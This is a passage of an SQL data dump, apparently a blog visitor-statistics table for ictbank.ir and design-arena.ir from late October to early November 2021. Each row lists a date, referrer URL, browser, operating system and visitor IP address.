(14613,'2021-10-26','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','54.203.73.198','000',0,1,0),
(14614,'2021-10-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(14615,'2021-10-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.60.133','000',0,1,0),
(14616,'2021-10-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(14617,'2021-10-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(14618,'2021-10-26','http://82.102.9.14/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','185.130.224.32','000',0,1,0),
(14619,'2021-10-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','177.234.143.164','000',0,2,0),
(14620,'2021-10-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,1,0),
(14621,'2021-10-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,1,0),
(14622,'2021-10-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','209.216.78.52','000',0,2,0),
(14623,'2021-10-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.139.68.232','000',0,2,0),
(14624,'2021-10-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(14625,'2021-10-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,1,0),
(14626,'2021-10-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,1,0),
(14627,'2021-10-27','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','194.36.25.47','000',0,2,0),
(14628,'2021-10-27','https://webtechsurvey.com/website/design-arena.ir','Chrome','Windows','10.0',NULL,NULL,'','138.128.118.130','000',0,2,0),
(14629,'2021-10-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(14630,'2021-10-27','http://ictbank.ir/blog','Safari','iOS','14.7.1',NULL,NULL,'','5.113.110.100','000',0,2,0),
(14631,'2021-10-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,16,0),
(14632,'2021-10-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','23.148.145.71','000',0,2,0),
(14633,'2021-10-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,2,0),
(14634,'2021-10-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.187.253','000',0,2,0),
(14635,'2021-10-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','91.132.58.197','000',0,2,0),
(14636,'2021-10-27','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','5.188.62.76','000',0,1,0),
(14637,'2021-10-27','http://webmail.design-arena.ir/blog','Chrome','Android','8.0',NULL,NULL,'','61.135.15.187','000',0,2,0),
(14638,'2021-10-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','144.48.106.66','000',0,2,0),
(14639,'2021-10-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.149.30','000',0,1,0),
(14640,'2021-10-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.240.2','000',0,1,0),
(14641,'2021-10-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.148','000',0,2,0),
(14642,'2021-10-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.57.247.214','000',0,1,0),
(14643,'2021-10-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.165.190.17','000',0,2,0),
(14644,'2021-10-27','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.165','000',0,1,0),
(14645,'2021-10-27','http://design-arena.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.146','000',0,1,0),
(14646,'2021-10-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(14647,'2021-10-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(14648,'2021-10-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(14649,'2021-10-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(14650,'2021-10-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.162.103.109','000',0,2,0),
(14651,'2021-10-27','http://webmail.design-arena.ir/blog','Chrome','Android','10.0',NULL,NULL,'','61.135.15.152','000',0,2,0),
(14652,'2021-10-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','51.158.21.238','000',0,2,0),
(14653,'2021-10-28','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.62','000',0,1,0),
(14654,'2021-10-28','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.236','000',0,1,0),
(14655,'2021-10-28','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.39','000',0,1,0),
(14656,'2021-10-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','173.252.95.18','000',0,1,0),
(14657,'2021-10-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.40','000',0,2,0),
(14658,'2021-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.6.189','000',0,2,0),
(14659,'2021-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.212.244.54','000',0,4,0),
(14660,'2021-10-28','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,2,0),
(14661,'2021-10-28','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','23.100.232.233','000',0,6,0),
(14662,'2021-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.31.248','000',0,1,0),
(14663,'2021-10-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(14664,'2021-10-28','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.254.34','000',0,2,0),
(14665,'2021-10-28','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(14666,'2021-10-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,2,0),
(14667,'2021-10-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.44.57','000',0,1,0),
(14668,'2021-10-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(14669,'2021-10-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14670,'2021-10-28','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.147','000',0,2,0),
(14671,'2021-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','41.220.200.165','000',0,1,0),
(14672,'2021-10-28','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.99.18.136','000',0,2,0),
(14673,'2021-10-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','139.162.207.84','000',0,2,0),
(14674,'2021-10-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(14675,'2021-10-29','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,1,0),
(14676,'2021-10-29','http://ictbank.ir/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,1,0),
(14677,'2021-10-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(14678,'2021-10-29','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.192','000',0,5,0),
(14679,'2021-10-29','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.187.137.177','000',0,8,0),
(14680,'2021-10-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.0.232.89','000',0,1,0),
(14681,'2021-10-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(14682,'2021-10-29','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.90.141','000',0,1,0),
(14683,'2021-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.28.56','000',0,2,0),
(14684,'2021-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','116.203.92.70','000',0,4,0),
(14685,'2021-10-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(14686,'2021-10-29','http://ictbank.ir/blog','Internet Explorer','Windows','10.0',NULL,NULL,'','185.90.165.11','000',0,5,0),
(14687,'2021-10-29','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.143','000',0,2,0),
(14688,'2021-10-29','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(14689,'2021-10-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14690,'2021-10-29','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.64','000',0,4,0),
(14691,'2021-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.212.32','000',0,1,0),
(14692,'2021-10-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','36.112.10.102','000',0,1,0),
(14693,'2021-10-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.8','000',0,2,0),
(14694,'2021-10-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(14695,'2021-10-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,2,0),
(14696,'2021-10-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(14697,'2021-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','209.141.49.117','000',0,2,0),
(14698,'2021-10-29','https://www.google.com','Chrome','Windows','10.0',NULL,NULL,'','149.56.19.35','000',0,40,0),
(14699,'2021-10-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(14700,'2021-10-30','http://mail.design-arena.ir/blog','Chrome','Android','7.0',NULL,NULL,'','61.135.15.154','000',0,2,0),
(14701,'2021-10-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(14702,'2021-10-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14703,'2021-10-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(14704,'2021-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.94.127','000',0,2,0),
(14705,'2021-10-30','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','23.100.232.233','000',0,4,0),
(14706,'2021-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.68.224','000',0,1,0),
(14707,'2021-10-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(14708,'2021-10-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','88.218.116.49','000',0,1,0),
(14709,'2021-10-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','122.15.156.179','000',0,2,0),
(14710,'2021-10-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','198.20.70.114','000',0,2,0),
(14711,'2021-10-30','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','5.234.29.74','000',0,1,0),
(14712,'2021-10-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(14713,'2021-10-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,2,0),
(14714,'2021-10-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(14715,'2021-10-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.214','000',0,5,0),
(14716,'2021-10-30','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','54.210.175.240','000',0,2,0),
(14717,'2021-10-31','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.99.18.136','000',0,7,0),
(14718,'2021-10-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.166.216.51','000',0,1,0),
(14719,'2021-10-31','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.99.18.122','000',0,3,0),
(14720,'2021-10-31','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.233.1.163','000',0,6,0),
(14721,'2021-10-31','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14722,'2021-10-31','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','191.96.168.202','000',0,2,0),
(14723,'2021-10-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','194.87.23.20','000',0,3,0),
(14724,'2021-10-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.58.61.147','000',0,2,0),
(14725,'2021-10-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.27.137.99','000',0,2,0),
(14726,'2021-10-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','91.92.215.81','000',0,3,0),
(14727,'2021-10-31','http://ictbank.ir/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,1,0),
(14728,'2021-10-31','http://www.ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','154.21.62.241','000',0,2,0),
(14729,'2021-10-31','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','154.21.39.27','000',0,1,0),
(14730,'2021-10-31','http://design-arena.ir/blog','UC Browser','Windows','6.1',NULL,NULL,'','45.130.127.6','000',0,1,0),
(14731,'2021-10-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','167.99.46.115','000',0,1,0),
(14732,'2021-10-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','84.17.42.25','000',0,1,0),
(14733,'2021-10-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.201.212.183','000',0,1,0),
(14734,'2021-10-31','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(14735,'2021-10-31','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','185.191.34.215','000',0,1,0),
(14736,'2021-10-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.232.88.121','000',0,1,0),
(14737,'2021-10-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(14738,'2021-10-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,2,0),
(14739,'2021-10-31','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','66.63.163.114','000',0,2,0),
(14740,'2021-10-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.162.103.109','000',0,2,0),
(14741,'2021-11-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,16,0),
(14742,'2021-11-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(14743,'2021-11-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.219.14','000',0,1,0),
(14744,'2021-11-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(14745,'2021-11-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.145.55','000',0,2,0),
(14746,'2021-11-01','http://ictbank.ir/blog','Firefox','Unknown','Unknown',NULL,NULL,'','124.206.180.139','000',0,2,0),
(14747,'2021-11-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.88.24','000',0,3,0),
(14748,'2021-11-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(14749,'2021-11-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.20.20','000',0,1,0),
(14750,'2021-11-01','http://ictbank.ir/','Firefox','Windows','6.2',NULL,NULL,'','141.95.33.140','000',0,1,0),
(14751,'2021-11-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.161.246','000',0,2,0),
(14752,'2021-11-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.8','000',0,1,0),
(14753,'2021-11-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(14754,'2021-11-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(14755,'2021-11-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(14756,'2021-11-01','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(14757,'2021-11-02','http://ictbank.ir/','Chrome','Windows','6.1',NULL,NULL,'','104.227.13.231','000',0,1,0),
(14758,'2021-11-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(14759,'2021-11-02','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','188.237.200.209','000',0,3,0),
(14760,'2021-11-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.130.66.150','000',0,2,0),
(14761,'2021-11-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.127.203.197','000',0,2,0),
(14762,'2021-11-02','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.156','000',0,1,0),
(14763,'2021-11-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(14764,'2021-11-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.114.166','000',0,2,0),
(14765,'2021-11-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,10,0),
(14766,'2021-11-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.26.26','000',0,1,0),
(14767,'2021-11-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.226.34','000',0,1,0),
(14768,'2021-11-02','http://ictbank.ir/blog','LieBao','Windows','6.2',NULL,NULL,'','141.95.33.140','000',0,1,0),
(14769,'2021-11-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.44.57','000',0,1,0),
(14770,'2021-11-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(14771,'2021-11-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(14772,'2021-11-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(14773,'2021-11-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.227.107.188','000',0,2,0),
(14774,'2021-11-03','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','151.234.142.2','000',0,1,0),
(14775,'2021-11-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(14776,'2021-11-03','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','167.99.127.156','000',0,2,0),
(14777,'2021-11-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14778,'2021-11-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.12.242.79','000',0,2,0),
(14779,'2021-11-03','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','172.247.34.127','000',0,1,0),
(14780,'2021-11-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','139.162.215.70','000',0,2,0),
(14781,'2021-11-03','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,1,0),
(14782,'2021-11-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.190.193.243','000',0,1,0),
(14783,'2021-11-03','http://123helpme.me/blog','Firefox','Linux','Unknown',NULL,NULL,'','195.37.190.88','000',0,4,0),
(14784,'2021-11-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.255.202','000',0,1,0),
(14785,'2021-11-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(14786,'2021-11-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(14787,'2021-11-03','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','178.79.169.97','000',0,2,0),
(14788,'2021-11-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(14789,'2021-11-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.209.87.86','000',0,1,0),
(14790,'2021-11-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(14791,'2021-11-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(14792,'2021-11-03','http://ictbank.ir/blog','Safari','OS X','10.15.6',NULL,NULL,'','92.60.50.240','000',0,1,0),
(14793,'2021-11-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(14794,'2021-11-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.188.182.61','000',0,2,0),
(14795,'2021-11-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,10,0),
(14796,'2021-11-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.71.225.147','000',0,1,0),
(14797,'2021-11-04','https://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','151.246.207.236','000',0,1,0),
(14798,'2021-11-04','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.237.93.133','000',0,1,0),
(14799,'2021-11-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.221','000',0,2,0),
(14800,'2021-11-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(14801,'2021-11-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.103','000',0,2,0),
(14802,'2021-11-04','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','176.74.192.85','000',0,2,0),
(14803,'2021-11-04','https://www.google.com/','Chrome','Android','11',NULL,NULL,'','5.236.189.24','000',0,3,0),
(14804,'2021-11-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(14805,'2021-11-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.85.52.160','000',0,2,0),
(14806,'2021-11-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','178.239.21.197','000',0,2,0),
(14807,'2021-11-04','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','2.185.154.73','000',0,1,0),
(14808,'2021-11-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(14809,'2021-11-04','http://happyfox.com/blog','Firefox','Linux','Unknown',NULL,NULL,'','195.37.190.88','000',0,4,0),
(14810,'2021-11-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.204.48','000',0,1,0),
(14811,'2021-11-04','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','212.111.43.90','000',0,2,0),
(14812,'2021-11-04','http://design-arena.ir/blog','Chrome','Chrome OS','Unknown',NULL,NULL,'','2.57.122.218','000',0,5,0),
(14813,'2021-11-04','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,1,0),
(14814,'2021-11-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,2,0),
(14815,'2021-11-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.214.182','000',0,1,0),
(14816,'2021-11-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(14817,'2021-11-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.20','000',0,2,0),
(14818,'2021-11-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','66.240.219.146','000',0,1,0),
(14819,'2021-11-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','143.244.140.251','000',0,2,0),
(14820,'2021-11-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','181.177.81.112','000',0,2,0),
(14821,'2021-11-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,10,0),
(14822,'2021-11-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','107.152.140.10','000',0,2,0),
(14823,'2021-11-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.9.8.180','000',0,1,0),
(14824,'2021-11-05','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.134.236','000',0,1,0),
(14825,'2021-11-05','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,1,0),
(14826,'2021-11-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.149.181.210','000',0,2,0),
(14827,'2021-11-05','http://www.ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','137.74.24.99','000',0,2,0),
(14828,'2021-11-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','34.235.171.51','000',0,110,0),
(14829,'2021-11-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.185.129.4','000',0,1,0),
(14830,'2021-11-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.36.221.166','000',0,1,0),
(14831,'2021-11-05','http://ictbank.ir/blog','Chrome','OS X','10.11.5',NULL,NULL,'','46.45.185.161','000',0,1,0),
(14832,'2021-11-05','http://ictbank.ir/blog','Chrome','OS X','10.11.5',NULL,NULL,'','46.45.185.173','000',0,1,0),
(14833,'2021-11-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(14834,'2021-11-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','49.12.196.162','000',0,2,0),
(14835,'2021-11-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.161.246','000',0,2,0),
(14836,'2021-11-05','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.180.231.247','000',0,2,0),
(14837,'2021-11-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.209.87.86','000',0,1,0),
(14838,'2021-11-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.221.8','000',0,1,0),
(14839,'2021-11-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
